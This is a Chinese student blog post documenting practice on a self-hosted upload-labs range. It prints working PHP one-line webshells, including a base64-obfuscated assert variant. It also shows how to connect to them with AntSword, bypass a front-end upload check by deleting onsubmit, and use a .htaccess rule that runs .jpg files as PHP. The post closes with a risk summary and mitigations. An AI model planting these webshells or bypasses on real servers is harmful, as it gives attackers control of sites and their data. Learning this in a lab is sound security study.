一句话木马及文件上传。

前言,本博客只用于记录,不用于参考,并且并非真实的网站,而是搭建的靶场。

(要是学长看了我的博客的话,能不能告诉我咱学校的网站有没有后门什么的(划掉),传授一些经验。)

第一步:文件上传靶场upload-labs搭建

首先,启动PHP_study.(什么,不知道,不会上网查吗。zhong_yan博主,你可真是个废物)

 将upload-labs-master拖拽至WWW(PHP_study)目录(本博客只是记录,并非参考)

 之后启动,就上面的那张图片(阿帕奇就可以了)

访问靶场,便搭建成功了

ps:以后可以用docker搭建靶场(ctf里面做的题目就是用这个靶场搭建的) 

 第二步:一句话木马(webshell)原理

webshell就是以asp、php、jsp、或者cgj等网页形式存在的一种命令执行环境,也可以称其为一种网页后门。

下面是一句话木马(PHP语言编写(记得学))

<?php @eval($_post['pass']);?>

php代码需要使用<?php?>括起来,服务器才能将其识别为PHP代码

@符号表示不报错,即使执行错误,也不会报错

密码为pass

Eval()函数

我们用上面这个代码来黑一下搭建的靶场。

先把以上的代码放到这里面

 之后访问(自己搭建的靶场)。

然后打开蚁剑。添加(自己搭建的靶场)

 之后双击,就可以进入靶场的内部了

 

<?php $ant=base64_decode("YXNzZXJ0");$ant($_post['ant']));?>

3、中国蚁剑(AntSword)安装使用

GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器icon-default.png?t=L9C2https://github.com/AntSwordProject/AntSword-Loader在这里下载,根据自己的电脑进行下载。

 下载完解压即可寻找使用。

4、 文件上传前端绕过

 5、实战操练

 

 

 把onsubmit给干掉,就没人拦截提交了(emm)

访问图片链接,就成功了。 

### PHP 实现句话木马文件上传的技术细节 #### 技术实现方式 在Web应用程序的安全防护不足的情况下,攻击者可能利用特定的配置漏洞来上传并执行恶意脚本。对于PHP环境而言,种常见的技术手段涉及创建极简的句话木马,其核心在于能够接收远程指令并通过`eval()`函数动态解释执行这些命令。 下面展示了种典型的句话木马形式: ```php <?php $x=$_POST['z']; @eval("$safedg = $x;"); ``` 此代码片段会捕获来自HTTP POST请求中的参数`z`的内容,并将其赋给变量$x;随后调用`@eval()`方法试图将$x所指向字符串当作PHP语句去运行[^3]。 #### 利用`.htaccess`绕过文件类型限制 当目标服务器允许用户自定义Apache配置时(即支持`.htaccess`),则可以通过修改此类文件使得某些非预期类型的文件也能按照PHP的方式处理。例如,在`.htaccess`内加入如下规则可以让JPG图片格式被视作PHP脚本来解析: ```apacheconf <FilesMatch ".*\.jpg$"> SetHandler application/x-httpd-php </FilesMatch> ``` 这意味着如果存在名为`shell.jpg`的实际图像文件中含有隐藏的PHP代码,则它现在可以在浏览器访问时被执行[^2]。 #### 安全风险分析 上述做法带来了严重的安全隐患,具体表现在以下几个方面: - **权限提升**:旦成功部署这样的木马程序,攻击者就能获得对受感染系统的完全控制权。 - **数据泄露**:借助于植入的后门机制,敏感信息可能会轻易被盗取。 - **服务中断**:恶意软件还可能导致网站无法正常运作甚至整个网络瘫痪。 - **法律后果**:非法入侵他人计算机信息系统属于违法行为,应承担相应的法律责任。 为了防止这类攻击的发生,建议采取措施强化应用层面上的安全策略,比如严格审查上传至服务器端的所有资源,以及合理调整PHP配置选项如关闭潜在危险的功能等[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值